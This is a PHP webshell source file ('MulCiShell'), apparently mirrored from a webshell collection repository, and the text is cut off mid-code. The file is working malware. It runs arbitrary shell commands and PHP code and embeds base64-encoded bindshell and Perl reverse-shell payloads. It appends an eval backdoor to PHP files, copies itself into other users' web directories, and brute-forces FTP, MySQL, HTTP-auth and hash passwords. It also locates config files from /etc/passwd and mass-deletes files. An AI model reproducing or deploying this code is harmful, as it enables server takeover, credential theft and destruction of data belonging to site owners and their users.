mirror of
https://github.com/BlackArch/webshells
synced 2024-09-20 14:21:56 +00:00
1460 lines
68 KiB
PHP
1460 lines
68 KiB
PHP
<?php
|
|
#/\/\/\/\/\ MulCiShell v0.2 - Edited By KingDefacer/\/\/\/\/\/\/\#
|
|
# Updates from version 1.0#
|
|
# 1) Fixed MySQL insert function
|
|
# 2) Fixed trailing dirs
|
|
# 3) Fixed file-editing when set to 777
|
|
# 4) Removed mail function (who needs it?)
|
|
# 5) Re-wrote & improved interface
|
|
# 6) Added actions to entire directories
|
|
# 7) Added config+forum finder
|
|
# 8) Added MySQL dump function
|
|
# 9) Added DB+table creation, DB drop, table delete, and column+table count
|
|
# 10) Updated security-info feature to include more useful details
|
|
# 11) _Greatly_ Improved file browsing and handling
|
|
# 12) Added banner
|
|
# 13) Added DB-Parser and locator
|
|
# 14) Added enumeration function
|
|
# 15) Added common functions for bypassing security restrictions
|
|
# 16) Added bindshell & backconnect (needs testing)
|
|
# 17) Improved command execution (alts)
|
|
#/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/#
|
|
@ini_set("memory_limit","256M");
|
|
@set_magic_quotes_runtime(0);
|
|
session_start();
|
|
ob_start();
|
|
$start=microtime();
|
|
if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme'];
|
|
//Thanks korupt ;)
|
|
$backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9pZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yaygpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9uIiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdCB0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9mYW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLnNfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9ydAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZHIsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0KIA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZGRyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PSAtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZXB0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRocmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaWQgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9";
|
|
$backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYWRkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsNCnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0K";
|
|
$pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpTb2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIGhvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcsDQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcGVuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk=";
|
|
$access_control=0;
|
|
$md5_user="KingDefacer";
|
|
$md5_pass="123";
|
|
$user_agent="KingDefacer";
|
|
$allowed_addrs=array('127.0.0.1');
|
|
$shell_email="KingDefacer@msn.com";
|
|
$self=basename($_SERVER['PHP_SELF']);
|
|
$addr=$_SERVER['REMOTE_ADDR'];
|
|
$serv=@gethostbyname($_SERVER['HTTP_HOST']);
|
|
$soft=$_SERVER['SERVER_SOFTWARE'];
|
|
$safe_mode=(@ini_get("safe_mode")=='')?"OFF":"ON";
|
|
$open_basedir=(@ini_get("open_basedir")=='')?"OFF":"ON";
|
|
$uname=@php_uname();
|
|
$space=TrueSize(disk_free_space(realpath(getcwd())));
|
|
$total=TrueSize(disk_total_space(realpath(getcwd())));
|
|
$id=@execmd("id",$disable);
|
|
$int_paths=array("mybb","phpbb","phpbb3","forum","forums","board","boards","bb","discuss");
|
|
$inc_paths=array("includes","include","inc");
|
|
$sql_build_path;
|
|
echo "<script type=\"text/javascript\" language=\"javascript\">
|
|
function togglecheck()
|
|
{
|
|
var cb=document.forms[0].check
|
|
for (i in cb)
|
|
{
|
|
cb[i].checked=(cb[i].checked)?false:true;
|
|
}
|
|
}
|
|
</script>";
|
|
switch($access_control) #Break statements intentionally ommited
|
|
{
|
|
case 3:
|
|
$ip_allwd=false;
|
|
foreach($allowed_addrs as $addr)
|
|
{
|
|
if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;}
|
|
if(!$ip_allwd) exit;
|
|
}
|
|
case 2:
|
|
if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass)
|
|
{
|
|
header("WWW-Authenticate: Basic Realm=\"Restricted area\"");
|
|
header("HTTP/1.1 401 Unauthorized");
|
|
echo "Wrong username/password";
|
|
exit;
|
|
}
|
|
case 1:
|
|
if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit;
|
|
}
|
|
if($id)
|
|
{
|
|
$s=strpos($id,"(",0)+1;
|
|
$e=strpos($id,")",$s);
|
|
$idval=substr($id,$s,$e-$s);
|
|
}
|
|
$disable=@ini_get("disable_functions");
|
|
if(empty($disable)) $disable="None";
|
|
function rm_rep($dir,&$success,&$fail)
|
|
{
|
|
@$dh=opendir($dir);
|
|
if(is_resource($dh))
|
|
{
|
|
while((@$rm=readdir($dh)))
|
|
{
|
|
if($rm=='.' || $rm=='..') continue;
|
|
if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...</br>"; rm_rep($dir.'/'.$rm,$success,$fail); continue;}
|
|
if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...</br>";}
|
|
else {$fail++; echo "Failed to delete $rm</br>";}
|
|
}
|
|
@closedir($dh);
|
|
} else echo "Failed to open dir $dir</br>";
|
|
}
|
|
function chmod_rep($dir,&$success,&$fail,$mod_value)
|
|
{
|
|
@$dh=opendir($dir);
|
|
if(is_resource($dh))
|
|
{
|
|
while((@$ch=readdir($dh)))
|
|
{
|
|
if($ch=='.' || $ch=='..') continue;
|
|
if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...</br>"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;}
|
|
if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...</br>";}
|
|
else {$fail++; echo "Failed to chmod $rm</br>";}
|
|
}
|
|
@closedir($dh);
|
|
} else echo "Failed to open dir $dir</br>";
|
|
}
|
|
#Complete these functions
|
|
function spread_self($user,&$c=0,$d=0)
|
|
{
|
|
if(!$d) $dir="/home/$user/public_html/";
|
|
else $dir=$d;
|
|
if(is_dir($dir)&&is_writable($dir))
|
|
{
|
|
copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php');
|
|
echo "[+] Shell copied to $dir.$f./mshell.php</br>";
|
|
$c++;
|
|
}
|
|
if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir</br>";
|
|
while((@$f=readdir($dh)))
|
|
{
|
|
if($f!="."&&$f!="..")
|
|
{
|
|
if(@is_dir($dir.$f))
|
|
{
|
|
echo "[+] Spreading to dir $dir</br>";
|
|
if(@is_writable($dir.$f))
|
|
{
|
|
copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php');
|
|
echo "[+] Shell copied to $dir.$f./mshell.php</br>";
|
|
$c++;
|
|
}
|
|
$c+=spread_self($user,$c,$dir.$f.'/');
|
|
}
|
|
}
|
|
}
|
|
}
|
|
function copy_rep($dir,&$c)
|
|
{
|
|
|
|
}
|
|
function backup_site()
|
|
{
|
|
if(!isset($_POST['busite']))
|
|
{
|
|
echo "<center>The following tool will attempt to retrieve every file from the specified dir (including child dirs).</br>If successful, you will be prompted for a site backup download.</br><i>Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.</i></center>";
|
|
}
|
|
}
|
|
function infect_rep($dir,&$success,&$fail)
|
|
{
|
|
}
|
|
function copy_dir($dir,$new_dir)
|
|
{
|
|
}
|
|
##################################
|
|
function execmd($cmd,$d_functions="None")
|
|
{
|
|
if($d_functions=="None") {$ret=passthru($cmd); return $ret;}
|
|
$funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
|
|
$d_functions=str_replace(" ","",$d_functions);
|
|
$dis_funcs=explode(",",$d_functions);
|
|
foreach($funcs as $safe)
|
|
{
|
|
if(!in_array($safe,$dis_funcs))
|
|
{
|
|
if($safe=="exec")
|
|
{
|
|
$ret=@exec($cmd);
|
|
$ret=join("\n",$ret);
|
|
return $ret;
|
|
}
|
|
elseif($safe=="system")
|
|
{
|
|
$ret=@system($cmd);
|
|
return $ret;
|
|
}
|
|
elseif($safe=="passthru")
|
|
{
|
|
$ret=@passthru($cmd);
|
|
return $ret;
|
|
}
|
|
elseif($safe=="shell_exec")
|
|
{
|
|
$ret=@shell_exec($cmd);
|
|
return $ret;
|
|
}
|
|
elseif($safe=="popen")
|
|
{
|
|
$ret=@popen("$cmd",'r');
|
|
if(is_resource($ret))
|
|
{
|
|
while(@!feof($ret))
|
|
$read.=@fgets($ret);
|
|
@pclose($ret);
|
|
return $read;
|
|
}
|
|
return -1;
|
|
}
|
|
elseif($safe="proc_open")
|
|
{
|
|
$cmdpipe=array(
|
|
0=>array('pipe','r'),
|
|
1=>array('pipe','w')
|
|
);
|
|
$resource=@proc_open($cmd,$cmdpipe,$pipes);
|
|
if(@is_resource($resource))
|
|
{
|
|
while(@!feof($pipes[1]))
|
|
$ret.=@fgets($pipes[1]);
|
|
@fclose($pipes[1]);
|
|
@proc_close($resource);
|
|
return $ret;
|
|
}
|
|
return -1;
|
|
}
|
|
}
|
|
}
|
|
return -1;
|
|
}
|
|
$links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode",
|
|
"Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf",
|
|
"Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill");
|
|
echo "<html><head><title>MulCiShell v2.0 - Edited By KingDefacer</title></head>";
|
|
switch($_SESSION['theme'])
|
|
{
|
|
case 'green':
|
|
echo "<style>
|
|
body{color:#66FF00; font-size: 12px; font-family: serif; background-color: black;}
|
|
td {border: 1px solid #00FF00; background-color:#001f00; padding: 2px; font-size: 12px; color: #33FF00;}
|
|
td:hover{background-color: black; color: #33FF00;}
|
|
input{background-color: black; color: #00FF00; border: 1px solid green;}
|
|
input:hover{background-color: #006600;}
|
|
textarea{background-color: black; color: #00FF00; border: 1px solid white;}
|
|
a {text-decoration: none; color: #66FF00; font-weight: bold;}
|
|
a:hover {color: #00FF00;}
|
|
select{background-color: black; color: #00FF00;}
|
|
#main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: center;}
|
|
#main a{padding-right: 15px; color:#00CC00; font-size: 12px; font-family: arial; text-decoration: none; }
|
|
#main a:hover{color: #00FF00; text-decoration: underline;}
|
|
#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
|
|
</style>
|
|
<body>";
|
|
break;
|
|
case 'dark':
|
|
echo "<style>
|
|
body{color: #FFFFFF; font-size: 12px; font-family: serif; background-color: #000000;}
|
|
td {border: 1px solid #FFFFFF; background-color: #000000; padding: 2px; font-size: 12px; color: #FFFFFF;}
|
|
input{background-color: black; color: #FFFFFF;; border: 1px solid #FFFFFF;}
|
|
input:hover{background-color: #000099;}
|
|
textarea{background-color: #000000; color: #FFFFFF; border: 1px solid white;}
|
|
a {text-decoration: none; color: #FFFFFF; font-weight: bold;}
|
|
a:hover {font-weight: bold;}
|
|
select{background-color: #000000; color: #FFFFFF;}
|
|
#main{border-bottom: 1px solid white; padding: 5px; text-align: center;}
|
|
#main a{padding-right: 15px; color:#FFFFFF; font-size: 12px; font-family: arial; text-decoration: none; }
|
|
#main a:hover{font-weight: bold;}
|
|
#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
|
|
</style><body>";
|
|
break;
|
|
default:
|
|
echo "<style>
|
|
body{color: white; font-size: 12px; font-family: arial; scrollbar-base-color:blue; scrollbar-arrow-color:yellow; scrollbar-face-color:blue; }
|
|
td {border: 1px solid #000099; background-color: #000033; padding: 2px; font-size: 12px; color: white; }
|
|
input{background-color: black; color: white; border: 1px solid #000066;}
|
|
input:hover{background-color: #000066; border: 1px solid white;}
|
|
td:hover {color: yellow; background: black;}
|
|
textarea{background-color: #000033; color: white; border: 1px solid white;}
|
|
a {text-decoration: none; color: white; font-weight: bold;}
|
|
a:hover {color: yellow}
|
|
select{background-color: black; color: white;}
|
|
#main{border-bottom: 1px solid #0066FF; padding: 5px; text-align: center;}
|
|
#main a{padding-right: 15px; color: white; font-size: 12px; font-family: arial; text-decoration: none; }
|
|
#main a:hover{color: #0033FF; text-decoration: underline;}
|
|
#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
|
|
</style>
|
|
<body bgcolor='black'>";
|
|
break;
|
|
}
|
|
echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv
|
|
bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg==");
|
|
echo "<table style='width: inherit; margin: auto; text-align: center;'>
|
|
<tr><td>Server IP</td><td>Your IP</td><td>Disk space</td><td>Safe_mode?</td><td>Open_BaseDir?</td><td>System</td><td>Server software</td><td>Disabled functions</td><td>ID</td><td>Shell location</td></tr>
|
|
<tr><td>$serv</td><td>$addr</td><td>$space of $total</td><td>$safe_mode</td><td>$open_basedir</td><td>$uname</td><td>$soft</td><td>$disable</td><td>$idval</td><td>".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."</td></tr>
|
|
</table></br>
|
|
<div id='main'>";
|
|
foreach($links as $val=>$addr) echo "<a href='$addr'>[ $val ]</a>";
|
|
echo "</div><br>";
|
|
if(isset($_POST['encryption']))
|
|
{
|
|
$e=$_POST['encrypt'];
|
|
echo "<form action='$self?' method='post'><center><textarea rows='19' cols='75' readonly>MD5: ".md5($e)."\nSHA1: ".sha1($e)."\nCrypt: ".crypt($e)."\nCRC32: ".crc32($e)."\nBase64 Encoded: ".base64_encode($e)."\nBase64 decoded: ".base64_decode($e)."\nURL encode: ".urlencode($e)."\nURL decode: ".urldecode($e)."\nBin2Hex ".bin2hex($e)."\nDec2Hex: ".dechex($e)."</textarea><br><br>Input: <input type='text' style='width: 300px' name='encrypt'>
|
|
<br><input type='submit' value='Encrypt' name='encryption'></center>";
|
|
}
|
|
if(isset($_POST['dogetfile']))
|
|
execmd("wget $_POST[wgetfile]",$disable);
|
|
if(isset($_POST['doUpload']))
|
|
{
|
|
$dir=$_POST['u_location'];
|
|
$name=$_FILES['u_file']['name'];
|
|
switch($_FILES['u_file']['error'])
|
|
{
|
|
case 0:
|
|
if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name))
|
|
echo "File uploaded successfully<br>";
|
|
else echo "Failed to upload file!";
|
|
}
|
|
}
|
|
if(isset($_POST['massfiles']))
|
|
{
|
|
$fail=0;
|
|
$success=0;
|
|
switch($_POST['fileaction'])
|
|
{
|
|
case 'Infect': #Nothing special here, just kick them while they're down
|
|
foreach($_POST['files'] as $file)
|
|
{
|
|
$ext=strrchr($file,'.');
|
|
if($ext!=".php") continue;
|
|
@$fh=fopen($file,'a');
|
|
if(@is_resource($fh))
|
|
{
|
|
$success++;
|
|
@fwrite($fh,"<?php @eval(\$_GET['e']) ?>");
|
|
@fclose($fh);
|
|
} else $fail++;
|
|
}
|
|
echo "Successfully infected $success files; failed to infect $fail files</br>Exploit files as such: file.php?e=php code";
|
|
break;
|
|
case 'Delete':
|
|
foreach($_POST['files'] as $file)
|
|
{
|
|
if(is_dir($file)) rm_rep($file,$success,$fail);
|
|
else
|
|
{
|
|
if(@unlink(CleanDir($file)))
|
|
{
|
|
echo "File $file deleted<br>";
|
|
$success++;
|
|
}
|
|
else
|
|
{
|
|
echo "Failed to delete file $file<br>";
|
|
$fail++;
|
|
}
|
|
}
|
|
}
|
|
echo "Total files deleted: $success; failed to delete $fail files<br>";
|
|
break;
|
|
case 'Chmod':
|
|
foreach($_POST['files'] as $file)
|
|
{
|
|
if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']);
|
|
if(@chmod(CleanDir($file),$_POST['cmodv']))
|
|
{
|
|
echo "Changed mode for $file<br>";
|
|
$success++;
|
|
}
|
|
else
|
|
{
|
|
echo "Failed to change mode for $file<br>";
|
|
$fail++;
|
|
}
|
|
}
|
|
echo "Total files modes modified: $success; failed to chmod $fail files<br>";
|
|
break;
|
|
}
|
|
}
|
|
if(isset($_POST['docrack']))
|
|
{
|
|
$con=true;
|
|
$show=0;
|
|
$list=@fopen($_FILES['wordlist']['tmp_name'],'r');
|
|
if(is_resource($list))
|
|
{
|
|
if(isset($_POST['ftpcrack']))
|
|
{
|
|
echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...</br>";
|
|
if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port'];
|
|
else $port='3306';
|
|
if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout']))
|
|
$time=3;
|
|
else $time=$_POST['ftp_timeout'];
|
|
@$ftp=ftp_connect($_POST['ftp_host'],$port,$time);
|
|
if(!$ftp) $con=false;
|
|
if($con)
|
|
{
|
|
$show++;
|
|
while(!feof($list))
|
|
{
|
|
@$pass=fgets($list);
|
|
if(ftp_login($ftp,$_POST['ftp_user'],trim($pass)))
|
|
{
|
|
echo "Password found! Password for $_POST[ftp_user] is $pass<br>";
|
|
@ftp_close($ftp);
|
|
break;
|
|
}
|
|
if($show==10000){echo "Trying pass $pass...</br>"; $show=0;}
|
|
}
|
|
} else echo "Failed to connect!</br>";
|
|
}
|
|
elseif(isset($_POST['remote_login']))
|
|
{
|
|
//if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled.");
|
|
/*
|
|
$ch=curl_init($_POST['remote_login_target']);
|
|
curl_setopt($ch,CURLOPT_HEADER,0);
|
|
curl_setopt($ch,CURLOPT_POST,1);
|
|
curl_setopt($ch,CURLOPT_POSTFIELDS,'');
|
|
curl_exec($ch);
|
|
*/
|
|
if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL.");
|
|
$path=explode('/',$_POST['remote_login_target']);
|
|
$site=$path[0];
|
|
for($i=1;$i<count($path);$i++) $full_path.='/'.$path[$i];
|
|
|
|
}
|
|
elseif(isset($_POST['vbcrack']))
|
|
{
|
|
if(empty($_POST['vbhash']) OR empty($_POST['vbsalt'])) die("Please specify a hash and salt");
|
|
while(!feof($list))
|
|
{
|
|
$show++;
|
|
$pass=trim(fgets($list));
|
|
$vbenc=md5(md5($pass).$_POST['vbsalt']);
|
|
if($vbenc===$_POST['vbhash'])
|
|
{
|
|
echo "Password for $_POST[vbhash] found! is $pass</br>";
|
|
break;
|
|
}
|
|
if($show===10000)
|
|
{
|
|
$show=0;
|
|
echo "Trying pass $pass...</br>";
|
|
}
|
|
}
|
|
echo "Complete</br>";
|
|
}
|
|
elseif(isset($_POST['mysqlcrack']))
|
|
{
|
|
$host=$_POST['mysql_host'];
|
|
$user=$_POST['mysql_user'];
|
|
if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]";
|
|
while(!feof($list))
|
|
{
|
|
$show++;
|
|
$pass=trim(fgets($list));
|
|
if(@mysql_connect($host,$user,$pass))
|
|
{
|
|
echo "Password found! Password for $user is $pass</br>";
|
|
break;
|
|
}
|
|
if($show==10000)
|
|
{
|
|
echo "Trying $pass...</br>";
|
|
$show=0;
|
|
continue;
|
|
}
|
|
}
|
|
}
|
|
elseif(isset($_POST['authcrack']))
|
|
{
|
|
$arr=explode('/',$_POST['auth_url']);
|
|
$con_url=$arr[0];
|
|
if(empty($_POST['auth_url'])) die("Enter a target first...");
|
|
for($i=1;$i<count($arr);$i++) $path.='/'.$arr[$i];
|
|
if(preg_match("/^http:\/\/+/",$_POST['auth_url'])) die("Do not include http:// in the url");
|
|
while(!feof($list))
|
|
{
|
|
if(is_resource($conn_url=fsockopen($con_url,80,$errno,$errstr,5)))
|
|
{
|
|
$show++;
|
|
$pass=trim(fgets($list));
|
|
if($show>5000) {$show=0; echo $pass;}
|
|
$encode=base64_encode(trim($_POST['auth_user']).':'.$pass);
|
|
$header="GET $path HTTP/1.1\r\n";
|
|
$header.="Host: $con_url\r\n";
|
|
$header.="Authorization: Basic $encode\r\n";
|
|
$header.="Connection: Close\r\n\r\n";
|
|
fputs($conn_url,$header,strlen($header));
|
|
$tmp++;
|
|
while(!feof($conn_url))
|
|
{
|
|
$tmp=fgets($conn_url);
|
|
if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp))
|
|
{
|
|
echo "Password found! Password=$pass</br></br>";
|
|
break 2;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
echo "Done</br>";
|
|
}
|
|
elseif(isset($_POST['md5crack']))
|
|
{
|
|
if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)");
|
|
$md5=trim($_POST['md5hash']);
|
|
while(!feof($list))
|
|
{
|
|
$show++;
|
|
$pass=trim(fgets($list));
|
|
if(md5($pass)===$md5)
|
|
{
|
|
echo "Password found! Plaintext for $md5 is $pass</br>";
|
|
break;
|
|
}
|
|
if($show==10000)
|
|
{
|
|
echo "Trying $pass...</br>";
|
|
$show=0;
|
|
continue;
|
|
}
|
|
}
|
|
}
|
|
elseif(isset($_POST['sha1crack']))
|
|
{
|
|
if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)");
|
|
$sha1=trim($_POST['sha1hash']);
|
|
while(!feof($list))
|
|
{
|
|
$show++;
|
|
$pass=trim(fgets($list));
|
|
if(sha1($pass)===$sha1)
|
|
{
|
|
echo "Password found! Plaintext for $sha1 is $pass</br>";
|
|
break;
|
|
}
|
|
if($show==10000)
|
|
{
|
|
echo "Trying $pass...</br>";
|
|
$show=0;
|
|
continue;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
@fclose($list);
|
|
}
|
|
if(isset($_POST['port_scan']))
|
|
{
|
|
switch($_POST['type'])
|
|
{
|
|
case 'php':
|
|
extract($_POST);
|
|
while($sport<=$eport)
|
|
{
|
|
echo "Trying port $sport";
|
|
if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open</br>";
|
|
$sport++;
|
|
}
|
|
break;
|
|
default:
|
|
echo "Invalid request</br>";
|
|
}
|
|
}
|
|
if(isset($_POST['find_forums']))
|
|
{
|
|
echo "<center><b>[ Forum locator ]</b></center></br></br>";
|
|
$found=0;
|
|
global $int_paths;
|
|
@$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!");
|
|
while(!feof($fp))
|
|
{
|
|
@list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp));
|
|
$path="/home/$user/public_html";
|
|
if(@is_dir($path))
|
|
{
|
|
foreach($int_paths as $forum_path)
|
|
{
|
|
$full_path=$path."/$forum_path/";
|
|
if(@is_dir($full_path))
|
|
{
|
|
echo "[+] Forum found: Path: $full_path</br>";
|
|
$found++;
|
|
continue;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
echo "Scan complete. Found $found forums</br></br>";
|
|
}
|
|
function find_configs($path,&$found)
|
|
{
|
|
if(@file_exists($path.'config.php'))
|
|
{
|
|
echo "Found config file: $path"."config.php</br>";
|
|
$found++;
|
|
}
|
|
@$dh=opendir($path);
|
|
while((@$file=readdir($dh)))
|
|
if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found);
|
|
@closedir($dh);
|
|
}
|
|
if(isset($_POST['find_configs']))
|
|
{
|
|
$found=0;
|
|
echo "<center><b>[ Config locator ]</b></center></br></br>";
|
|
@$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!");
|
|
while(!feof($fp))
|
|
{
|
|
@list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp));
|
|
$path="/home/$user/public_html/";
|
|
find_configs($path,$found);
|
|
}
|
|
@fclose($fp);
|
|
echo "Scan complete. Found $found configs</br></br>";
|
|
}
|
|
if(isset($_POST['execmd']))
|
|
{echo "<center><textarea rows='10' cols='100'>";
|
|
echo execmd($_POST['cmd'],$disable);
|
|
echo "</textarea></center>";}
|
|
if(isset($_POST['execphp']))
|
|
{echo "<center><textarea rows='10' cols='100'>";
|
|
echo eval(stripslashes($_POST['phpcode']));
|
|
echo "</textarea></center>";}
|
|
if(isset($_POST['cnewfile']))
|
|
{
|
|
if(@fopen($_POST['newfile'],'w')) echo "File created<br>";
|
|
else echo "Failed to create file<br>";
|
|
}
|
|
if(isset($_POST['cnewdir']))
|
|
{
|
|
if(@mkdir($_POST['newdir'])) echo "Directory created<br>";
|
|
else echo "Failed to create directory<br>";
|
|
}
|
|
if(isset($_POST['doeditfile'])) FileEditor();
|
|
switch($_GET['act'])
|
|
{
|
|
case 'backc':
|
|
if(!isset($_POST['backconnip']))
|
|
{
|
|
echo "<center><form action='$self?act=backc' method='post'>
|
|
Address: <input type='text' value='$_SERVER[REMOTE_ADDR]' name='backconnip'>
|
|
Port: <input type='text' value='1337' name='backconnport'>
|
|
<input type='submit' value='Connect'></br></br>
|
|
Listen with netcat by executing 'nc -l -n -v -p 1337'</br></br>
|
|
<b>Note: Be sure to foward your port first</b>
|
|
</form></center>";
|
|
} else {
|
|
if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port");
|
|
if(is_writable("."))
|
|
{
|
|
